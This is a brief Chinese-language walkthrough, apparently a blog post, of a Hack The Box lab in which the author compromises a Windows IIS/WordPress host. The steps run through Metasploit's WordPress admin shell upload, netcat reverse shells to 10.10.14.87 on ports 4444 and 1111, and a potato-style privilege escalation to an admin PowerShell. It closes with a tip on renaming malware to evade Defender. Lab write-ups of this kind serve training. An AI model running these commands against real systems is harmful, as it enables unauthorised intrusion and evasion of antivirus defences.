扫描出来80 ISS和 3306 mysql
bp发现路径下有wordpress
查看wordpress版本,网页搜索generator
即可搜到generator
wordpress 登陆界面,使用看到的admin账户和先前的密码登录即可。
使用msf的exploit/unix/webapp/wp_admin_shell_upload
就可以获得meterpreter shell,注意要设置LHOSTS不然弹不回来
cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
在\wordpress\wp-content\uploads
目录下上传nc
upload /home/kali/Desktop/tools/windows-exe/nc.exe
反弹shell execute -f nc.exe -a "-e cmd.exe 10.10.14.87 4444"
这里我傻了端口跟msf的meterpreter重复了,所以获取不到shell,并且nc也不支持-e。。。
使用这个可以
在metepreter里可以使用sysinfo
查看os信息
查看到windowsserver2016 可以使用 这个
上传一个内容为
START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.14.87 1111
的bat脚本
upload /home/kali/Desktop/HTB/StartingPoint/29/shell.bat
随后,先监听新的端口nc -lvp 1111
在第一次获取的shell中js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
成功即可获得admin权限的powershell
知识点
win移动要使用/ / /,不能简单复制linux的\ \ \ \
一般恶意软件需要改名,不然更容易被defender识别
msf获取的shell感觉不是特别的稳定
这应该叫使用cve获取高权限再反弹出来
「真诚赞赏,手留余香」
真诚赞赏,手留余香
使用微信扫描二维码完成支付